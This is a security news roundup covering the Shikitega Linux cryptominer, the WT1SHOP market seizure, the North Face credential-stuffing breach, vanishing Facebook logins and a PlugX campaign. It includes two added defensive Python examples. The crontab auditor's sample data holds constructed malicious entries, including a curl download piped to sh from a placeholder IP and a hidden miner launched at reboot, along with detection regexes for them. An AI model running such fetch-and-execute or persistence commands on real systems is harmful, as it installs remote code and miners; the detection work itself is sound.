Shape-shifting cryptominer wreaking havoc on Linux endpoints and IoT • The Register

AT&T cybersecurity researchers have discovered sneaky malware targeting Linux endpoints and IoT devices in hopes of gaining persistent access and turning victims into crypto-mining drones.

The malware was named “Shikitega” for its extensive use of the popular Shikata Ga Nai polymorphic encoder, which allows the malware to “mutate” its code to avoid detection. Shikitega changes its code each time it runs through one of several decoding loops, in a multi-stage chain that AT&T said starts with an ELF file only 370 bytes in size.

Shikitega also downloads Mettle, a Metasploit Meterpreter implementation that gives the attacker the ability to control connected webcams and that includes a sniffer, multiple reverse shells, process control, shell command execution, and additional abilities to control the affected system.

AT&T didn’t say how the initial infection came about, but it did say Shikitega exploits two Linux vulnerabilities disclosed in 2021 to achieve its ultimate goal, which AT&T said appears to be to install and run the XMRig cryptocurrency miner.

The final stage also establishes persistence, which Shikitega does by downloading and running five shell scripts that configure a pair of cron jobs for the current user and a pair for the root user, installing crontab first if it is not already available.
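A defender’s first question after reading the paragraph above is “what would those cron entries look like on my hosts, and how would I spot them?” The following is an added example, not AT&T’s code and not Shikitega’s actual cron lines: it parses `crontab -l` style output for a user and for root and flags entries that match generic persistence heuristics (a download piped straight into a shell, commands living under world-writable directories, hidden path components, raw IP literals). The sample crontabs and the IP addresses in them are constructed for illustration.

```python
"""Audit crontab entries for common cron-based persistence patterns.

Added example for illustration only; the sample crontabs below are
constructed and do not reproduce any real malware's cron jobs.
"""
import re
from typing import Dict, List

# Constructed sample: what `crontab -l` might print for an ordinary user.
SAMPLE_USER_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/backup.sh
*/5 * * * * curl -s http://203.0.113.7/x.sh | sh
@reboot /tmp/.x/miner -o 203.0.113.7:3333
"""

# Constructed sample: what `crontab -l` might print for root.
SAMPLE_ROOT_CRONTAB = """\
0 * * * * /usr/sbin/logrotate /etc/logrotate.conf
*/10 * * * * /dev/shm/.s/run
"""

# Heuristics applied to the command field of each entry: (label, regex).
SUSPICIOUS_PATTERNS = [
    ("download-piped-to-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("world-writable-dir", re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/")),
    ("hidden-path-component", re.compile(r"/\.[^/\s]+")),
    ("raw-ip-literal", re.compile(r"\b\d{1,3}(\.\d{1,3}){3}\b")),
]


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split crontab text into {schedule, command} records.

    Comments, blank lines and VAR=value lines are skipped. Both five-field
    schedules and @keyword schedules (e.g. @reboot) are handled.
    """
    entries: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue  # malformed entry; cron would reject it too
            parts = [" ".join(fields[:5]), fields[5]]
        if len(parts) == 2:
            entries.append({"schedule": parts[0], "command": parts[1]})
    return entries


def audit_crontab(text: str, owner: str) -> List[Dict[str, object]]:
    """Return one finding per entry whose command trips at least one heuristic."""
    findings: List[Dict[str, object]] = []
    for entry in parse_crontab(text):
        reasons = [label for label, rx in SUSPICIOUS_PATTERNS if rx.search(entry["command"])]
        if reasons:
            findings.append({
                "owner": owner,
                "schedule": entry["schedule"],
                "command": entry["command"],
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    # On a live host you would feed in the output of `crontab -l` and
    # `sudo crontab -l` (plus /etc/cron.d) instead of the samples.
    for finding in audit_crontab(SAMPLE_USER_CRONTAB, "user") + audit_crontab(SAMPLE_ROOT_CRONTAB, "root"):
        print(finding)
```

The heuristics are deliberately broad: a legitimate job can live under `/tmp` or call `curl`, so treat a hit as a prompt to look at the entry, not as proof of compromise. Pairing cron jobs for both an unprivileged user and root, as the paragraph describes, is itself a signal worth alerting on because it suggests the attacker already has root.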

Shikitega also uses cloud hosting services to store parts of its payload, and further obfuscates itself by contacting those hosts by IP address rather than by domain name. “Without domain names, it is difficult to provide a complete list of detection indicators because they are volatile and are used for legitimate purposes in a short period of time,” AT&T said.

Conclusion: Shikitega is a nasty piece of code. AT&T recommends Linux endpoint and IoT device managers install security patches, keep EDR software up to date, and regularly back up critical systems.

US and Portuguese authorities shut down stolen online data market

A joint operation between Portuguese and US authorities has led to the seizure of WT1SHOP, an online marketplace selling nearly six million sets of stolen credentials and personally identifiable information (PII).

In a Justice Department announcement of the seizure, the US Attorney for the District of Maryland said Portuguese authorities seized the website, while US law enforcement shut down four domains used by WT1SHOP: two .net addresses, a .cc domain and a .com.

An online search revealed that a Russian-based version of the site still appears to be online, although it is unknown if it is still operational.

In the announcement, the DoJ said WT1SHOP contained approximately 25,000 scanned driver’s licenses and passports, 1.7 million sets of credentials from various websites, 108,000 bank accounts and 21,800 credit cards.

Not only did WT1SHOP have an impressive range of data for sale, it was growing rapidly. The DoJ said that as of June 2020, the site had about 60,823 registered users and 91 sellers and had sold about 2.4 million credentials, earning it about $4 million. As of December 2021, the site had 106,273 users, 94 sellers, and the aforementioned millions of PII records.

The DoJ also unsealed its criminal complaint against alleged WT1SHOP operator and Moldovan citizen Nicolai Colesnicov, who was charged with conspiracy and trafficking in unauthorized access devices. If convicted, Colesnicov faces ten years in prison.

Law enforcement agencies were able to determine that Colesnicov was the likely culprit behind the site by tracking bitcoin sales made on the site and payments sent to web hosts and accounts linked to it.

The DoJ did not say in the announcement whether it knew Colesnicov’s whereabouts or whether authorities had arrested him. If he is in his home country, the US might have trouble catching him as Moldova does not have an extradition treaty with the US.

Credential stuffing avalanche at The North Face brings 200,000 records online

Popular adventure apparel brand The North Face and footwear maker Vans, subsidiaries of the same parent company, have disclosed (PDF) a credential stuffing attack that netted its attacker the PII of 194,905 users.

Almost all of the PII stored on the two websites was compromised, with the exception of credit card numbers, which the brands’ parent company, VF Outdoors, says it doesn’t store on its websites. Aside from that one bright spot, thieves made off with data like billing and shipping addresses, email addresses, full names and dates of birth, phone numbers, and more—a gift for identity thieves.

Credential stuffing uses previously obtained account credentials (such as those sold by WT1SHOP) to fraudulently log into accounts on other sites where the same username and password were reused. Motives vary, from gaining insider access to secured systems to stealing additional personal information for use in future crimes or for sale online.
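The signature of credential stuffing in a site’s login logs is one source hammering many different accounts with mostly failing attempts, with an occasional success where a reused password matched. The following is an added example, not VF’s or The Register’s code, showing how a defender might surface that pattern: it parses a simple “timestamp source_ip username outcome” log, slides a time window over each source IP, and flags IPs that touched many distinct accounts with a low success ratio, listing the accounts that did succeed so they can be forced through a password reset. The log lines and IP addresses are constructed for illustration; the window and thresholds are assumptions to tune per site.

```python
"""Flag credential-stuffing patterns in web login logs.

Added example for illustration; the sample log below is constructed.
Format of each line: "ISO-timestamp source_ip username SUCCESS|FAIL".
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample: one IP sprays six different accounts in a few seconds
# (one reused password happens to work), one IP retries a single account,
# and one IP is an ordinary successful login.
SAMPLE_LOG = """\
2022-08-01T10:00:00 198.51.100.5 alice@example.com FAIL
2022-08-01T10:00:01 198.51.100.5 bob@example.com FAIL
2022-08-01T10:00:02 198.51.100.5 carol@example.com FAIL
2022-08-01T10:00:03 198.51.100.5 dave@example.com SUCCESS
2022-08-01T10:00:04 198.51.100.5 erin@example.com FAIL
2022-08-01T10:00:05 198.51.100.5 frank@example.com FAIL
2022-08-01T10:05:00 203.0.113.9 alice@example.com FAIL
2022-08-01T10:05:30 203.0.113.9 alice@example.com SUCCESS
2022-08-01T11:00:00 192.0.2.44 grace@example.com SUCCESS
"""


def parse_log(text: str) -> List[Dict[str, object]]:
    """Turn log lines into event dicts; usernames are lower-cased so that
    'Alice@' and 'alice@' count as the same account."""
    events: List[Dict[str, object]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, outcome = line.split()
        events.append({
            "ts": datetime.fromisoformat(ts),
            "ip": ip,
            "user": user.lower(),
            "ok": outcome == "SUCCESS",
        })
    return events


def detect_stuffing(events: List[Dict[str, object]],
                    window: timedelta = timedelta(minutes=10),
                    min_users: int = 5,
                    max_success_ratio: float = 0.5) -> Dict[str, Dict[str, object]]:
    """Per source IP, slide `window` over its attempts (sorted by time) and
    alert when a window holds at least `min_users` distinct accounts with a
    success ratio at or below `max_success_ratio`. Returns
    {ip: {"distinct_users", "attempts", "compromised"}} for the widest window."""
    by_ip: Dict[str, List[Dict[str, object]]] = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_ip[e["ip"]].append(e)

    alerts: Dict[str, Dict[str, object]] = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            # advance the window start until it fits within `window`
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            users = {e["user"] for e in win}
            successes = [e["user"] for e in win if e["ok"]]
            if len(users) >= min_users and len(successes) / len(win) <= max_success_ratio:
                prev = alerts.get(ip)
                if prev is None or len(users) > prev["distinct_users"]:
                    alerts[ip] = {
                        "distinct_users": len(users),
                        "attempts": len(win),
                        "compromised": sorted(set(successes)),
                    }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_stuffing(parse_log(SAMPLE_LOG)).items():
        print(ip, info)
```

The single-account retry from `203.0.113.9` is left alone: two attempts at one account is ordinary user behaviour (or a brute-force attempt, which a per-account lockout handles), whereas the distinct-account count is what separates stuffing from both. In production the IP key is weak on its own, since stuffing tools rotate through proxies, so the same window logic is usually also run keyed on user-agent string, ASN, or a device fingerprint.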

According to VF, the company has disabled passwords and deleted payment card tokens. Users affected by the breach will be forced to create new passwords and re-enter payment information. VF hasn’t said if it blocked the attacker’s access, which may not be reassuring to those looking for confirmation they’re safe going forward.

As in past credential stuffing attacks, the data used to break into The North Face and Vans accounts may not have been stolen from VF, which the company is reminding users to take into account when setting a new password.

“If a breach occurs on… other websites, an attacker could use your email address and password to access your account [with us],” the company said in letters to affected users.

Facebook login buttons are disappearing from the internet

The near-ubiquitous Facebook login buttons on third-party sites are gradually disappearing, with brands like Dell, Best Buy, Ford Motor Company, Nike, Twitch, Patagonia, and others all recently removing this option.

According to CNBC, while Facebook users used to enjoy the option of not having to create a new account on participating sites, the scandal-plagued social media giant has been losing users who have become suspicious about what they share with Meta’s brands in the wake of allegations and data breaches.

Identity management company LoginRadius CEO Rakesh Soni told CNBC that scandals like Cambridge Analytica have taught users more about what Facebook is doing with their data; they are mad at the site and don’t want to give it access to online activity beyond what it already knows.

Dell CIO Jen Felch told CNBC that these concerns have led to a decline in customers using social logins, which she says suggests that “people are making the decision to isolate that social media account, instead of having other connections to it”.

“We were really just looking at how many people were choosing to sign in with their social media identity, and that’s changed over time,” Felch said. According to CNBC, Dell still has an option on its websites to sign in with a Google account because it’s the only option with significant engagement.

CNBC said Dell first removed the Facebook login option about a month ago, and Meta doesn’t appear to have commented on the change or its importance to the company’s bottom line since.

When Apple announced App Tracking Transparency, which requires apps to give users an opt-in choice for tracking, Meta expressed concerns that the move would hurt the company’s profits. After less than a year of availability, social media companies including Facebook had lost a collective $10 billion in advertising revenue.

Bronze President (not this one) attacks EMEA, South America

A malware campaign discovered by researchers at the Secureworks Counter Threat Unit (CTU) suggests that the suspected Chinese state-sponsored hacking group Bronze President may have new targets in Europe, the Middle East and South America.

The attack targeted government officials in the three regions, CTU said. The structure of the attack is similar to Bronze President’s previous campaigns and fits its modus operandi of launching politically relevant attacks against government officials.

The malware campaign analyzed by CTU centered on the PlugX malware, a remote access trojan used by a number of government-sponsored hacking groups. CTU said the attack was not particularly sophisticated, relying on phishing and tricking targets into opening a malicious RAR file to run the PlugX payload.

Based on the directory structure of the RAR file used in the attack, CTU said it is likely being distributed through phishing emails. Once the victim opens the RAR file and clicks on an LNK file disguised as a document, the malware gets to work by dropping an easily hijacked DLL file onto the target’s system, which it then uses to load additional payloads.

Bronze President has traditionally launched attacks against China’s neighbors such as Myanmar and Vietnam, but CTU said the group had “demonstrated an ability to quickly seek new intelligence-gathering opportunities.”

Case in point: Bronze President moved earlier this year when Russia invaded Ukraine and managed to install malware on systems owned by Russian officials.

Secureworks also discovered that earlier campaign, which points to a shift in the group’s intelligence-gathering strategy across different countries.

“The war in Ukraine has prompted many countries to use their cyber skills to gain insight into global events, political machinations and motivations. This desire for situational awareness often extends to gathering intelligence from allies and ‘friends,’” CTU said. ®

Laura Coffey
